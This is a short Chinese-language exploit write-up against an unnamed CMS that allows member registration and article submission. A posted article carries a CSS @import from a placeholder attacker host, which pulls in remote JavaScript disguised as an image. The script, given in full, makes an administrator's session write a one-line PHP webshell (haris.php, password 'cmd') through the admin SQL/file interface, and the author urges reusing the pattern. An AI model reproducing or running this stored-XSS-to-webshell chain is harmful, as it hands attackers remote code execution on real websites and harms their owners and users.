利用条件:开启注册&&开启投稿
方法 :注册会员 -> 发表文章:内容输入
<style>@import 'http://xxx.com/xss.css';</style>
xss.css内容:
body{background-image:url('javascript:document.write("<script src=http://xxx.com/logo.jpg></script>")')}
logo.jpg内容:
var request = false;
if (window.XMLHttpRequest) {
request = new XMLHttpRequest();
if (request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if (window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
var length = versions.length;
for (var i=0; i<length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {
}
}
}
var xmlhttp = request;
function getFolder(url) {
var obj = url.split('/')
return obj[obj.length-2];
}
var oUrl = top.location.href;
var u = getFolder(oUrl);
add_admin();
function add_admin() {
var url= "/" + u + "/sys_sql_query.php";
var params = "fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=%3C%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++";
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "Keep-Alive");
xmlhttp.send(params);
}
管理员后台访问或者审核或者保持登陆状态进行前台访问,会在data目录下生成一句话木马haris.php,密码cmd。
记住这个js脚本吧,get、post、 cookies都可以用这种模式。
这个ajax写得很完善,新浪蠕虫依赖jquery直接使用ajax。